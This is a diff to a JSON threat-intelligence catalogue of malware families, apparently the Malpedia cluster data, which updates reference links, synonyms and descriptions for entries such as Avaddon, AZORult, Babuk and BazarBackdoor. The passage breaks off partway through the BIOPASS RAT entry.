+ "https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/", + "https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/", + "https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire", "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/", + "https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/", "https://www.swascan.com/it/avaddon-ransomware/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://arxiv.org/pdf/2102.04796.pdf", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", - "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/", + "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://twitter.com/dk_samper/status/1348560784285167617", + "https://arxiv.org/pdf/2102.04796.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.tgsoft.it/files/report/download.asp?id=568531345", - "https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/" + "https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/" ], "synonyms": [], "type": [] }, "uuid": "8f648193-68ca-40c2-98b2-e5481487463e", - "value": "Avaddon Ransomware" + "value": "Avaddon" }, { "description": "", @@ -8925,25 +10174,34 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest", - "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique", - "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/", - "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.youtube.com/watch?v=81fdvmGmRvM", + "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html", "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1", "https://reaqta.com/2019/04/ave_maria-malware-part1/", - "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/", - "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery", "https://www.youtube.com/watch?v=T0tdj1WDioM", - "https://blog.yoroi.company/research/the-ave_maria-malware/", - "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", - "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", - "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", + "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest", + "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA", + "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA" + "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique", + "https://www.youtube.com/watch?v=-G82xh9m4hc", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://blog.yoroi.company/research/the-ave_maria-malware/", + "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/", + "https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat" ], "synonyms": [ "AVE_MARIA", @@ -8956,6 +10214,20 @@ "uuid": "6bae792a-c2d0-42eb-b9e0-6ef1d83f9b25", "value": "Ave Maria" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker", + "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/", + "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8cee7a73-df5f-4ca3-ac52-b8a29a9b7414", + "value": "AvosLocker" + }, { "description": "", "meta": { @@ -8981,6 +10253,19 @@ "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", "value": "Ayegent" }, + { + "description": "Keylogger.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke", + "https://snort.org/rule_docs/1-34217" + ], + "synonyms": [], + "type": [] + }, + "uuid": "91524400-097c-4584-9168-05b317d57b63", + "value": "Aytoke" + }, { "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.", "meta": { @@ -8988,8 +10273,10 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/", + "https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/", + "https://community.riskiq.com/article/2a36a7d2/description", "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", - "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", + "https://community.riskiq.com/article/56e28880", "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05", "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", @@ -8997,6 +10284,7 @@ "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://isc.sans.edu/diary/25120", + "https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/", "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", "https://www.youtube.com/watch?v=EyDiIAt__dI", "https://fr3d.hk/blog/gazorp-thieving-from-thieves", @@ -9004,16 +10292,21 @@ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", + "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", "https://twitter.com/DrStache_/status/1227662001247268864", "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf", "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/", "https://unit42.paloaltonetworks.com/cybersquatting/", "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", + "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://securelist.com/azorult-analysis-history/89922/", "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", @@ -9023,6 +10316,7 @@ "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/", @@ -9060,26 +10354,53 @@ "value": "Babar" }, { - "description": "", + "description": "Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf", - "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/", + "https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/", "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62", - "https://twitter.com/Sebdraven/status/1346377590525845504", - "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/", + "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/", + "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", - "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html" + "https://twitter.com/Sebdraven/status/1346377590525845504", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/", + "https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/", + "https://securelist.com/ransomware-world-in-2021/102169/", + "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/", + "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings", + "https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/", + "https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/", + "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", + "https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/", + "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", + "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f", + "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", + "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html", + "https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/", + "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", + "https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/", + "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b", + "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/", + "https://twitter.com/GossiTheDog/status/1409117153182224386", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/", + "https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf", + "https://www.fr.sogeti.com/globalassets/france/avis-dexperts--livres-blancs/cybersecchronicles_-_babuk.pdf" ], "synonyms": [ - "Babyk Ransomware", + "Babyk", "Vasa Locker" ], "type": [] }, "uuid": "3e243686-a0a0-4aff-b149-786cc3f99a84", - "value": "Babuk Ransomware" + "value": "Babuk (Windows)" }, { "description": "", @@ -9114,14 +10435,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark", - "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "https://www.youtube.com/watch?v=rfzmHjZX70s", + "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html", "https://blog.alyac.co.kr/3352", + "https://www.youtube.com/watch?v=Dv2_DK3tRgI", + "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", - "https://twitter.com/i/web/status/1099147896950185985", + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", "https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", + "https://twitter.com/i/web/status/1099147896950185985", + "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html" ], "synonyms": [], @@ -9199,7 +10526,8 @@ "https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", - "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/" + "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree" ], "synonyms": [], "type": [] @@ -9248,6 +10576,20 @@ "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", "value": "badflick" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch", + "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf", + "https://team-cymru.com/blog/2021/03/15/fin8-badhatch-threat-indicator-enrichment/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8e8880bf-d016-4759-a138-2fdb4e54f9ab", + "value": "BADHATCH" + }, { "description": "", "meta": { @@ -9258,6 +10600,7 @@ "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", "https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://securelist.com/apt-trends-report-q1-2021/101967/", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf", @@ -9387,10 +10730,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook", "https://twitter.com/malwrhunterteam/status/796425285197561856", - "https://research.checkpoint.com/2020/bandook-signed-delivered/", - "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot", "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", - "https://www.eff.org/files/2018/01/29/operation-manul.pdf" + "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook", + "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot", + "https://research.checkpoint.com/2020/bandook-signed-delivered/", + "https://www.eff.org/files/2018/01/29/operation-manul.pdf", + "https://www.welivesecurity.com/2021/07/07/bandidos-at-large-spying-campaign-latin-america/" ], "synonyms": [ "Bandok" @@ -9487,7 +10832,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", - "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" + "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html", + "https://www.rewterz.com/rewterz-news/rewterz-threat-alert-common-raven-iocs" ], "synonyms": [], "type": [] @@ -9517,9 +10863,15 @@ "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware", "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration", - "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/", + "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html", + "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", + "https://unit42.paloaltonetworks.com/bazarloader-malware/", + "https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/", "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day", "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/", + "https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/", + "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", "https://thedfirreport.com/2020/10/08/ryuks-return/", @@ -9529,21 +10881,35 @@ "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/", "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", + "https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf", "https://unit42.paloaltonetworks.com/ryuk-ransomware/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors", "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/", "https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader", "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.youtube.com/watch?v=uAkeXCYcl4Y", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors", + "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/", + "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/", "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I", + "https://isc.sans.edu/diary/27308", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/", "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II", + "https://fr3d.hk/blog/campo-loader-simple-but-effective", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", "https://twitter.com/anthomsec/status/1321865315513520128", "https://www.hhs.gov/sites/default/files/bazarloader.pdf", "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/", @@ -9552,12 +10918,18 @@ "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9", "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://www.scythe.io/library/threatthursday-ryuk", - "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", + "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", + "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles", "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/", "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor", @@ -9566,10 +10938,10 @@ ], "synonyms": [ "BEERBOT", - "BazarCall", "KEGTAP", "Team9Backdoor", - "bazaloader" + "bazaloader", + "bazarloader" ], "type": [] }, @@ -9581,11 +10953,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarnimrod", + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques", + "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", + "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware", "https://twitter.com/James_inthe_box/status/1357009652857196546", "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", - "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811" + "https://www.healthcareinfosecurity.com/spear-phishing-campaign-distributes-nim-based-malware-a-16176", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf" + ], + "synonyms": [ + "NimzaLoader" ], - "synonyms": [], "type": [] }, "uuid": "1735a331-9ca9-49b6-a5aa-0ddac9db8de6", @@ -9741,9 +11119,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.betabot", - "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", + "https://www.cybereason.com/blog/betabot-banking-trojan-neurevt", "http://www.xylibox.com/2015/04/betabot-retrospective.html", "https://news.sophos.com/en-us/2020/05/14/raticate/", "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", @@ -9870,6 +11249,19 @@ "uuid": "04803315-fc17-44d0-839e-534b9da4c7fc", "value": "bioload" }, + { + "description": "BIOPASS RAT is a malware family which targets online gambling companies in China by leveraging a watering hole attack. This Remote Access Trojan (RAT) is unique in that it leverages the Open Broadcaster Software (OBS) framework to monitor the user's screen.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.biopass", + 